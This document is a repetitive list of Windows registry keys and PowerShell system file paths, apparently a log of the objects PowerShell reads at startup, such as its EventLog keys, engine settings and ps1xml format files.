HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
